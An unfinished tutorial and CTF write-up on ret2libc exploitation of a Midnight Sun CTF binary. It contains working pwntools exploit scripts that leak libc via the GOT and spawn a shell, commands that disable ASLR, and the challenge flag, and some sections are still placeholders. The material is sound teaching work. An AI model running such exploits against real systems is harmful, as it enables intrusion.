3 April 2020

an intro to ret2libc & pwntools (64bit)

article is still WIP

In this article, I give you an introduction to exploiting stack buffer overflows when the NX and ASLR security mitigations are enabled. First, we write a simplified exploit with ASLR disabled and use a technique called return-oriented programming (ROP) to bypass NX. We then enable ASLR and rewrite the exploit to leak the data needed to bypass it.

Along the way I introduce you to pwntools and guide you through the exploit development steps to grant you a shell.

This article assumes you know how to exploit a vanilla stack buffer overflow.

Make sure you have the following tools installed:
pwntools
gdb-peda
radare2
Ghidra

Download the package from here if you want to follow along.

Our example binary is from the Midnight Sun CTF 2020 qualifier competition. In the archive you can also find the shared library libc.so, which we will need later.

Starting the binary, we see it asks us to provide an input and exits once we press enter.

Let’s open the binary in Ghidra and look for vulnerable functions. The vulnerability resides in the decompiled main function:

undefined8 main(void)

{
  char local_48 [64];
  
  setvbuf(stdin,(char *)0x0,2,0);
  setvbuf(stdout,(char *)0x0,2,0);
  alarm(0x3c);
  FUN_00400687();
  printf("buffer: ");
  gets(local_48);
  return 0;
}

We can see that the function gets stores our input in the variable local_48, a 64-byte buffer on the stack. gets performs no bounds checking: it keeps writing until it reads a newline. A buffer overflow therefore occurs as soon as the input is longer than 64 bytes.

Looking at the enabled security mitigations via gdb-peda, we get the following:

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

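We can see that NX is enabled, so we cannot execute shellcode from the stack and have to use ROP instead. There is no stack canary, so nothing detects the overwritten return pointer, and PIE is disabled, so the addresses inside the binary itself (code, PLT, GOT) are fixed. RELRO is only partial, which means the GOT entries for libc functions are resolved lazily at run time; with ASLR enabled, the libc addresses stored there differ on every application start.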

TO DO WRITE COMBINATION TEXT

We use a handy Python package called pwntools, made for automating common pwn tasks in CTFs. It helps us to interact with the binary and the command line interface. It also includes lots of useful functions for quick exploit development.

For developing the exploit locally, we will use the libc of our own system. We can use ldd to see which libraries the binary relies on:

dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ ldd pwn1 
	linux-vdso.so.1 (0x00007ffff7fcf000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7dc8000)
	/lib64/ld-linux-x86-64.so.2 (0x00007ffff7fd0000)

Let’s copy that version of libc into our directory for later use.

Preparing pwntools

We will be using the following python code as a skeleton to develop our exploit:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = gdb.debug('./pwn1', 'c') # starting gdb with our binary and continuing execution
binary = ELF('./pwn1') # loading the binary into pwntools
context.binary = binary # setting up all pwntool settings suited for the binary
rop = ROP(binary) # loading our binary to look for gadgets and building rop chains
libc = ELF('libc.so.6')
p.recvuntil("buffer:") # we tell pwntools to wait until it receives the string in stdout
p.interactive() # to continue interacting with python

Triggering the crash

We know that the buffer is of size 64. Let’s create a cyclic pattern of size 80 and feed it to our binary to trigger a crash. Let us add the following line before the interactive part:

p.sendline(cyclic(80))

Run the script. It will open a new prompt with gdb and run the program.

We see the program crashing, since the saved return pointer now contains part of our pattern, which is not a valid address.

We have overwritten the saved return pointer successfully.

Getting control over the instruction pointer

Now we need to find out how much junk data we need to reliably control the saved return pointer (SRP). Looking at the stack, we see a part of our cyclic pattern: saaataaa. Let’s find out which offset this belongs to. Take the first 4 bytes and feed them to the command line tool cyclic, which was installed as part of the pwntools package:

dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ cyclic -l "saaa"
72

We need 72 bytes of junk data to overwrite the saved return pointer. The next 8 bytes will end up in $rip.
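To see where the number 72 comes from, here is a minimal pure-Python sketch of the kind of lookup cyclic performs. It assumes the pwntools defaults of a lowercase alphabet and 4-byte subsequences; the names de_bruijn and pattern are chosen for this illustration and are not the pwntools API.

```python
from itertools import islice
import string


def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence in which every n-character window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


# The same 80 characters we sent to the binary (assuming pwntools defaults).
pattern = "".join(islice(de_bruijn(string.ascii_lowercase, 4), 80))

# Every 4-character window is unique, so its position tells us the offset.
offset = pattern.find("saaa")
print(offset)
```

Because each 4-byte window occurs only once, the bytes found in the saved return pointer identify their position in the input unambiguously. The result also fits the stack layout one would expect here: 64 bytes of buffer followed, presumably, by 8 bytes of saved frame pointer.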

Let’s also note down the address of the ret instruction in gdb, so that we can set a breakpoint there for debugging and add it to our exploit. To verify that we have control over $rip, we append the pointer 0xdeadbeef to our padding.

We now have the following code:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = gdb.debug('./pwn1', '''
	b *0x400716
	c
''')
binary = ELF('./pwn1')
context.binary = binary
rop = ROP(binary)
libc = ELF('libc.so.6')
p.recvuntil("buffer:")

rop.raw("A" * 72)
rop.raw(0xdeadbeef) # our SRP
p.sendline(rop.chain())
p.interactive()

Rerunning the script, we can see 0xdeadbeef at the top of the stack meaning we have overwritten the saved return pointer and now have control over the instruction pointer:

The ret2libc attack (without ASLR)

Our goal is to get a shell. Since NX is enabled, we cannot execute data on the stack, so we have to use a different technique called return-oriented programming (ROP). Our binary does not contain the function system, but the linked C standard library does. Making use of the libc that is loaded into memory, we redirect the control flow to call this function:

system("/bin/sh")

Note:
Plenty of programs use functions from the standard C library. To provide a standard runtime environment and to save space, those functions are packaged in a separate file (libc.so). During application startup, this file is mapped into the program’s memory so that its functions can be called. You can see where libc is loaded by running the command vmmap in gdb-peda.

Instead of putting shellcode on to the stack, we put pointers and function arguments. Those pointers help us to put the function argument (“/bin/sh”) into the proper register and finally call the system function.

Let us have a look at a simplified attack by using static pointers. For this example, we intentionally disable ASLR:

echo 0 > /proc/sys/kernel/randomize_va_space

Note:
ASLR (Address Space Layout Randomization) is a security mitigation that makes it harder to exploit buffer overflows. Its purpose is to prevent exploits from relying on static pointers: the base addresses of the stack, the heap and the shared libraries are randomized at every program startup.

Calling conventions
On the amd64 architecture (System V calling convention, as used on Linux), the first six integer or pointer arguments of a function are passed in the following registers, in this order:
RDI
RSI
RDX
RCX
R8
R9

system takes a single argument, so we need a pointer to the string “/bin/sh” in the $rdi register. Luckily, libc itself contains this string. We can use the following pwntools command to look up its address:

next(libc.search(b'/bin/sh'))

Next, we need a pointer to instructions that move data from the stack into the $rdi register and end with a return. One suitable set of instructions (aka gadget) is this:

pop rdi     #put data from the top of the stack into rdi and increment rsp
ret         #put data from the top of the stack into rip and increment rsp

Note:
Ideally, a gadget contains no extra instructions between the ones we need and the ret. Otherwise we might have to take the extra instructions into account and adjust our payload accordingly. Sometimes, there are no perfect gadgets available.

We can find a pop_rdi_ret gadget with radare2:

[0x004005a0]> /R pop rdi
  0x00400783                 5f  pop rdi
  0x00400784                 c3  ret
[0x004005a0]>
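To make the effect of this gadget concrete, the following sketch walks a tiny chain the way the CPU would after main executes its ret. It is a toy model, not an emulator: only the gadget address 0x400783 comes from the radare2 output above, while FAKE_BINSH and FAKE_SYSTEM are placeholder values invented for the illustration.

```python
import struct

POP_RDI_RET = 0x400783            # gadget address found with radare2 above
FAKE_BINSH = 0x4141414141414141   # placeholder, not a real address
FAKE_SYSTEM = 0x4242424242424242  # placeholder, not a real address

# Known gadgets: address -> registers popped before the gadget's final ret.
GADGETS = {POP_RDI_RET: ["rdi"]}


def simulate(chain):
    """Consume the chain 8 bytes at a time, like a sequence of ret/pop steps."""
    stack = list(struct.unpack("<%dQ" % (len(chain) // 8), chain))
    regs = {}
    visited = []
    while stack:
        rip = stack.pop(0)        # ret: pop the next pointer into rip
        visited.append(rip)
        if rip not in GADGETS:    # we left our gadgets, e.g. entered system
            break
        for reg in GADGETS[rip]:  # pop <reg>: pop the next value into reg
            regs[reg] = stack.pop(0)
    return regs, visited


chain = struct.pack("<QQQ", POP_RDI_RET, FAKE_BINSH, FAKE_SYSTEM)
regs, visited = simulate(chain)
print(hex(regs["rdi"]), [hex(v) for v in visited])
```

The value placed directly after the gadget address ends up in rdi, and the value after that becomes the next instruction pointer. This is exactly the order in which we will lay out our payload.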

We will also need the base address of where libc will be mapped into the binary’s virtual memory space:

dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ ldd pwn1 
	linux-vdso.so.1 (0x00007ffff7fcf000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7dc8000) <--- base addr
	/lib64/ld-linux-x86-64.so.2 (0x00007ffff7fd0000)

To get a pointer to system, we can ask pwntools to look for one in libc:

libc.symbols['system']

Our payload looks like this:

 +--------------------+--------------------+---------------------+-----------------+
 |                    |                    |                     |                 |
 | junk "A" * 72      | pop rdi ret gadget | ptr to "/bin/sh"    | ptr to system   |
 |                    |                    |                     |                 |
 +--------------------+--------------------+---------------------+-----------------+

Our updated exploit:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = gdb.debug('./pwn1', '''
	b *0x400716
	c
''')
binary = ELF('./pwn1')
context.binary = binary
rop = ROP(binary)
libc = ELF('libc.so.6')
p.recvuntil("buffer:")

libc.address = 0x00007ffff7dc8000
rop.raw("A" * 72)
rop.raw(0x400783) # pop_rdi address
rop.raw(next(libc.search(b'/bin/sh'))) # target libc
rop.raw(libc.symbols['system'])

p.sendline(rop.chain())
p.interactive()

Running the exploit and continuing after the breakpoint results in the following crash:

You can see that the execution halted at the movaps instruction, which resides inside the do_system function. This is a well-known issue with the libc shipped by Ubuntu, in which system uses movaps instructions to move data to the stack. movaps requires its memory operand to be aligned to 16 bytes. When the stack is not aligned, the instruction triggers a fault.

Let’s look at our stack alignment. If we divide rsp by 16 and do not get a whole number, we know the stack is not aligned properly: rsp = 140737488347144, rsp/16 = 8796093021696.5

If we add another 8 bytes and then divide by 16, we get a whole number again.

(140737488347144+8)/16 = 8796093021697

That means in order to fix our exploit, one way would be to add an additional 8 bytes of padding to our payload.
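The same check can be written with the modulo operator, which avoids reading fractions. This is a small sketch using the rsp value from the crash above; the helper name is_16_byte_aligned is made up for this example.

```python
def is_16_byte_aligned(address):
    """movaps needs its stack operand at an address divisible by 16."""
    return address % 16 == 0


rsp = 140737488347144  # rsp at the time of the crash

misaligned = not is_16_byte_aligned(rsp)
fixed = is_16_byte_aligned(rsp + 8)

print(hex(rsp), misaligned, fixed)
```

In hexadecimal the problem is visible at a glance: an aligned address ends in 0, whereas ours ends in 8. Every additional ret in the chain pops 8 bytes, so one extra ret shifts rsp by exactly the missing amount.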

The only data we can add is a pointer to executable code, because the CPU will jump to whatever address sits at that position and continue execution from there. So which pointer should we add, and where shall we put it in our payload? We add a pointer that points directly to a ret instruction and put it right before our pointer to system.

Let’s reuse our gadget we got from radare2 and pick the address of our ret instruction:

[0x004005a0]> /R ret
  0x00400784                 c3  ret
[0x004005a0]>

Adding the new stack alignment pointer, we have the following code:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = gdb.debug('./pwn1', '''
	c
''') # removed breakpoint
binary = ELF('./pwn1')
context.binary = binary
rop = ROP(binary)
libc = ELF('libc.so.6')
p.recvuntil("buffer:")

libc.address = 0x00007ffff7dc8000
rop.raw("A" * 72)
rop.raw(0x400783) # pop_rdi address
rop.raw(next(libc.search(b'/bin/sh')))
rop.raw(0x00400784) # stackalignment
rop.raw(libc.symbols['system'])

p.sendline(rop.chain())
p.interactive()

Running the script, we see that a new process is forked for “/usr/bin/dash” (replacement for sh):

Back in our terminal, we now have a shell and can interact with the system:

[*] Switching to interactive mode
 Detaching from process 30225
Detaching from process 30240
$ id
Detaching from process 30242
uid=1000(dan) gid=1000(dan) groups=1000(dan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),119(lpadmin),130(lxd),131(sambashare)

Child exited with status 0
[*] Process '/usr/bin/gdbserver' stopped with exit code 0 (pid 30225)
$

We have successfully hijacked the control flow and got a shell!

Our final payload:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = process('./pwn1')
binary = ELF('./pwn1')
context.binary = binary
rop = ROP(binary)
libc = ELF('libc.so.6')
p.recvuntil("buffer:")

libc.address = 0x00007ffff7dc8000 # defining it here, so that pwntools adjusts all offsets automatically
rop.raw("A" * 72)
rop.raw(0x400783) # pop_rdi address
rop.raw(next(libc.search(b'/bin/sh'))) # target libc
rop.raw(0x00400784) # stackalignment
rop.raw(libc.symbols['system'])

p.sendline(rop.chain())
p.interactive()

The ret2plt & ret2libc attack (with ASLR)

Let’s reenable ASLR:

echo 2 > /proc/sys/kernel/randomize_va_space
// 2 - for full randomization

Our exploit now breaks, since the base address of libc, and with it the addresses of our string and of system, is randomized every time we run the binary. We can run ldd several times to see where libc would end up in memory:

dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ ldd pwn1 
	linux-vdso.so.1 (0x00007ffe04bf9000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe54ef04000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fe54f108000)
dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ ldd pwn1 
	linux-vdso.so.1 (0x00007ffe7cdfe000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f9dc7360000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f9dc7564000)
dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ ldd pwn1 
	linux-vdso.so.1 (0x00007ffdb196a000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f0f707ae000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f0f709b2000)

As you can see, the base address is always different.

Since the address of system is now randomized, we need a way to determine it at run time. If we can leak a pointer to any libc function and also have a copy of the target system’s libc binary, we are able to calculate the shared library’s base address: every function sits at a constant offset from the start of the shared library, so we subtract that known offset from the leaked pointer and get the base address of libc. Pwntools will assist us in that process.

How do we find such a pointer?

Our plan to leak a pointer is to call puts (instead of system), so that it prints a pointer to the console for us. The pointer we print is the GOT entry of puts itself, but it could just as well be the GOT entry of any other libc function the binary has already called.

PARTIAL RELRO - LAZY BINDING - get the diagram from the book

Note: Why can we call puts but not system, even though both are from libc and ASLR is enabled? Our binary was not compiled as a position-independent executable (PIE), as we saw earlier in checksec. Therefore, its Procedure Linkage Table (PLT) and Global Offset Table (GOT) are located at fixed addresses. For every shared library function used by the binary, the linker creates a stub in the PLT and a matching entry in the GOT; at run time, the GOT entry is filled with the function’s real address in libc. The function puts is used by our binary, so we can call it through its static PLT address. The function “system” is not called by our binary and therefore no stub for it exists in the PLT.

In summary: the PLT stub is the fixed entry point for calling a shared library function, and the GOT holds the pointer to the function’s actual address.

plt

dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ objdump -d pwn1 -j .plt

pwn1:     file format elf64-x86-64


Disassembly of section .plt:

0000000000400540 <puts@plt-0x10>:
  400540:	ff 35 c2 1a 20 00    	pushq  0x201ac2(%rip)        # 602008 <setvbuf@plt+0x201a78>
  400546:	ff 25 c4 1a 20 00    	jmpq   *0x201ac4(%rip)        # 602010 <setvbuf@plt+0x201a80>
  40054c:	0f 1f 40 00          	nopl   0x0(%rax)

0000000000400550 <puts@plt>:
  400550:	ff 25 c2 1a 20 00    	jmpq   *0x201ac2(%rip)        # 602018 <setvbuf@plt+0x201a88>
  400556:	68 00 00 00 00       	pushq  $0x0
  40055b:	e9 e0 ff ff ff       	jmpq   400540 <puts@plt-0x10>

0000000000400560 <printf@plt>:
  400560:	ff 25 ba 1a 20 00    	jmpq   *0x201aba(%rip)        # 602020 <setvbuf@plt+0x201a90>
  400566:	68 01 00 00 00       	pushq  $0x1
  40056b:	e9 d0 ff ff ff       	jmpq   400540 <puts@plt-0x10>

0000000000400570 <alarm@plt>:
  400570:	ff 25 b2 1a 20 00    	jmpq   *0x201ab2(%rip)        # 602028 <setvbuf@plt+0x201a98>
  400576:	68 02 00 00 00       	pushq  $0x2
  40057b:	e9 c0 ff ff ff       	jmpq   400540 <puts@plt-0x10>

0000000000400580 <gets@plt>:
  400580:	ff 25 aa 1a 20 00    	jmpq   *0x201aaa(%rip)        # 602030 <setvbuf@plt+0x201aa0>
  400586:	68 03 00 00 00       	pushq  $0x3
  40058b:	e9 b0 ff ff ff       	jmpq   400540 <puts@plt-0x10>

0000000000400590 <setvbuf@plt>:
  400590:	ff 25 a2 1a 20 00    	jmpq   *0x201aa2(%rip)        # 602038 <setvbuf@plt+0x201aa8>
  400596:	68 04 00 00 00       	pushq  $0x4
  40059b:	e9 a0 ff ff ff       	jmpq   400540 <puts@plt-0x10>

The linker also records a relocation entry for each of these GOT slots. Let’s take a look at all entries in the .rela.plt section:

dan@ubuntu:/mnt/hgfs/ctf/midnightsunctf/pwn1/pwn1$ readelf --relocs pwn1

Relocation section '.rela.dyn' at offset 0x448 contains 4 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000601ff0  000400000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.2.5 + 0
000000601ff8  000500000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0
000000602050  000800000005 R_X86_64_COPY     0000000000602050 stdout@GLIBC_2.2.5 + 0
000000602060  000900000005 R_X86_64_COPY     0000000000602060 stdin@GLIBC_2.2.5 + 0

Relocation section '.rela.plt' at offset 0x4a8 contains 5 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000602018  000100000007 R_X86_64_JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0
000000602020  000200000007 R_X86_64_JUMP_SLO 0000000000000000 printf@GLIBC_2.2.5 + 0
000000602028  000300000007 R_X86_64_JUMP_SLO 0000000000000000 alarm@GLIBC_2.2.5 + 0
000000602030  000600000007 R_X86_64_JUMP_SLO 0000000000000000 gets@GLIBC_2.2.5 + 0
000000602038  000700000007 R_X86_64_JUMP_SLO 0000000000000000 setvbuf@GLIBC_2.2.5 + 0

We can see that no entry for system exists.

Let’s check out how this looks in the debugger. Fire up the binary in gdb and enter the following commands:

starti
b gets

Let us see what the disassembly of puts looks like before lazy binding has occurred:

gdb-peda$ disas puts
Dump of assembler code for function puts@plt:
   0x0000000000400550 <+0>:	jmp    QWORD PTR [rip+0x201ac2]        # 0x602018 <puts@got.plt>
   0x0000000000400556 <+6>:	push   0x0
   0x000000000040055b <+11>:	jmp    0x400540

Here we see the PLT stub. The first instruction jumps to the address stored in our GOT entry. Let’s see what value resides there:

gdb-peda$ x/qx 0x602018
0x602018 <puts@got.plt>:	0x00400556

As expected, the GOT entry points to the second instruction of the PLT stub of puts. We let the program continue until it breaks at gets and inspect the GOT entry again:

gdb-peda$ x/qx 0x602018
0x602018 <puts@got.plt>:	0x00007ffff7e4f490

We see the entry has been populated with a pointer to libc’s puts. Also, when we try to disassemble puts now, we see the actual function instead of the PLT stub.

gdb-peda$ disas puts
Dump of assembler code for function __GI__IO_puts:
Address range 0x7ffff7e4f490 to 0x7ffff7e4f66c:
   0x00007ffff7e4f490 <+0>:	endbr64 
   0x00007ffff7e4f494 <+4>:	push   r14
   0x00007ffff7e4f496 <+6>:	push   r13
[...]
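The before and after values of the GOT entry observed above can be modelled with a few lines of Python. This is only a toy model of lazy binding, not how the dynamic linker is implemented; the function names resolve and call_through_plt are invented for the sketch, while the two addresses are the ones from the gdb session.

```python
PUTS_PLT_PUSH = 0x400556       # second instruction of puts@plt
PUTS_IN_LIBC = 0x7ffff7e4f490  # address of puts as seen in gdb

# State at program start: the GOT slot points back into the PLT stub.
got = {"puts": PUTS_PLT_PUSH}


def resolve(name):
    """Stand-in for the symbol lookup done by the dynamic linker."""
    return {"puts": PUTS_IN_LIBC}[name]


def call_through_plt(name):
    """Return the address where execution ends up when calling name@plt."""
    if got[name] == PUTS_PLT_PUSH:  # slot is still unresolved
        got[name] = resolve(name)   # first call: look up and patch the GOT
    return got[name]


before = got["puts"]
first_call = call_through_plt("puts")
after = got["puts"]
second_call = call_through_plt("puts")

print(hex(before), hex(after))
```

The first call pays for the lookup and patches the slot; every later call jumps straight to libc. For our exploit, the patched slot is the interesting part, because it contains a libc address at a location we know in advance.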

Leaking a function pointer and getting libc

We now know that we need to leak the pointer stored in the GOT entry of puts. We also know that this entry is only populated once puts has been called for the first time (lazy binding). If we leaked the GOT entry before the function was called, we would get a pointer into the function’s PLT stub instead of the actual libc function, and calculating the libc base address from it would not be possible.
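Here is a sketch of the base address arithmetic, using values that appear in this article. It assumes that ldd and gdb mapped libc at the same base when ASLR was off, which is how the offset of puts is derived here; in a real exploit the offset comes from the libc file itself. The helper names are made up for the example.

```python
PAGE_SIZE = 0x1000

LIBC_BASE_NO_ASLR = 0x7ffff7dc8000  # from ldd with ASLR disabled
PUTS_RESOLVED = 0x7ffff7e4f490      # GOT entry after puts was called
PUTS_UNRESOLVED = 0x400556          # GOT entry before puts was called

# Assumption: both values above belong to the same memory layout.
puts_offset = PUTS_RESOLVED - LIBC_BASE_NO_ASLR


def libc_base_from_leak(leak, symbol_offset):
    """Subtract the constant offset of the symbol from its leaked address."""
    return leak - symbol_offset


def looks_like_base(address):
    """Shared libraries are mapped at page boundaries."""
    return address > 0 and address % PAGE_SIZE == 0


# puts prints the pointer as raw little-endian bytes and stops at the first
# null byte, so only 6 bytes arrive for a typical userland address.
leak = int.from_bytes(bytes.fromhex("90f4e4f7ff7f"), "little")

# Simulate an ASLR run using one of the randomized bases printed by ldd.
aslr_base = 0x7F9DC7360000
recovered = libc_base_from_leak(aslr_base + puts_offset, puts_offset)

# An unresolved GOT entry does not give a plausible base address.
bogus = libc_base_from_leak(PUTS_UNRESOLVED, puts_offset)

print(hex(puts_offset), hex(recovered), looks_like_base(bogus))
```

Checking that the computed base is page aligned is a cheap sanity test: if the result does not end in three zero hex digits, either the leak was parsed incorrectly or the local libc does not match the one used by the target.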

Since only partial RELRO is active, function addresses are resolved via lazy binding: only when a function is called for the first time is its address looked up.

DIAGRAM HERE

Remember, libc’s position in memory changes every time we start the program. That’s why we need to leak the address and exploit the binary within the same run, before it exits. How do we achieve this? Our program exits once we have entered data. We can prevent this by adding another pointer at the end of our payload, which points back to the start of the main function, so that the program asks for input a second time.

ret2plt

gots/plt

If the address of loaded libraries is loaded

attack scenario:
1. we look for a libc function which has already been called once, so that its GOT entry holds the resolved libc address (here: puts)
2. we send our first stage payload, which overwrites the saved return pointer to call puts (PLT) and print the content of the GOT entry of puts
3. we redirect the execution flow back to the main function
4. we calculate the base address of libc from the leaked pointer
5. we create our second payload, with the right offsets for “/bin/sh” and “system”
6. we launch our second payload to get a shell
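The first stage of this scenario can be laid out by hand to see which bytes end up on the stack. The sketch below uses only the standard library; the local p64 helper mimics the pwntools function of the same name, and the addresses are the ones shown in the radare2, objdump and readelf output in this article, plus the address of main used in the solution further down.

```python
import struct


def p64(value):
    """Pack an integer as an 8-byte little-endian pointer."""
    return struct.pack("<Q", value)


OFFSET = 72             # bytes until the saved return pointer
POP_RDI_RET = 0x400783  # gadget found with radare2
PUTS_GOT = 0x602018     # GOT slot of puts (readelf --relocs)
PUTS_PLT = 0x400550     # PLT stub of puts (objdump)
MAIN = 0x400698         # where we return to for the second stage

stage1 = b"A" * OFFSET
stage1 += p64(POP_RDI_RET)  # load the next value into rdi
stage1 += p64(PUTS_GOT)     # argument: address of the GOT entry
stage1 += p64(PUTS_PLT)     # puts(puts@got) prints the libc pointer
stage1 += p64(MAIN)         # restart main so we can send stage two

# gets stops reading at a newline, so the payload must not contain one.
has_newline = b"\n" in stage1

print(len(stage1), has_newline)
```

Since gets reads up to the first newline, it is worth checking that none of the packed addresses contains the byte 0x0a; otherwise the payload would be cut off at that position.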

the final exploit dev recipe: 1. overwrite the buffer with a cyclic pattern 2. replacing

Getting the libc addresses

Leaking the address

A great explanation of GOT/plt and relro can be found here:

But in a nutshell: with partial RELRO, the GOT entries for libc functions are filled in lazily at run time, and with ASLR enabled the libc pointers stored there change on every application start.

The recipe:

find a libc function which has already been called once before our payload runs, so that its GOT entry is populated with the function’s address instead of a pointer back into the PLT stub

My solution:

#!/usr/bin/python3

from pwn import *
from struct import pack

p = remote('pwn1-01.play.midnightsunctf.se',10001)

binary = ELF('./pwn1')
context.binary = binary #this is needed so a correct rop chain based on the binary arch can be generated
rop = ROP(binary)

libc = ELF('libc.so')

rop.raw("A" * 72)
rop.puts(binary.got['puts'])

rop.call(0x400698) # main function

log.info("obtaining address leak of puts:\n" +rop.dump())

p.recvuntil("buffer:") 
p.sendline(rop.chain())
leakedPuts = p.recvline()[:8].strip()
log.success("Leaked puts@GLIBC: {}".format(leakedPuts))

leakedPuts = int.from_bytes(leakedPuts, byteorder='little') # puts printed the raw pointer bytes in little-endian order

libc.address = leakedPuts - libc.symbols["puts"] # rebasing libc, so that pwntools adjusts all later lookups automatically

pop_rdi = p64(0x400783) # pop_rdi address
sh = p64(next(libc.search(b'/bin/sh'))) # target libc
sys = p64(libc.symbols['system'])
padding = b"A"*72

#stack alignment for movaps instruction ubuntu
# simple pointer to a ret function just to keep the stackaligned by 16 bytes
stack_alignment = p64(0x00400784)

p.recvuntil("buffer:")
payload = padding + pop_rdi + sh + stack_alignment + sys #stacklignment is only needed for ubuntu

print(sh)
p.sendline(payload)

p.interactive()

The flag midnight{the_pwnshank_redemption_d2b4205bea4b8eeb}

Additional resources:

Bonus Challenges:

Change the payload to use one_gadget
Use a different technique like ret2got
Implement an automated libc address lookup based on the leaked pointer by integrating libc-database into your exploit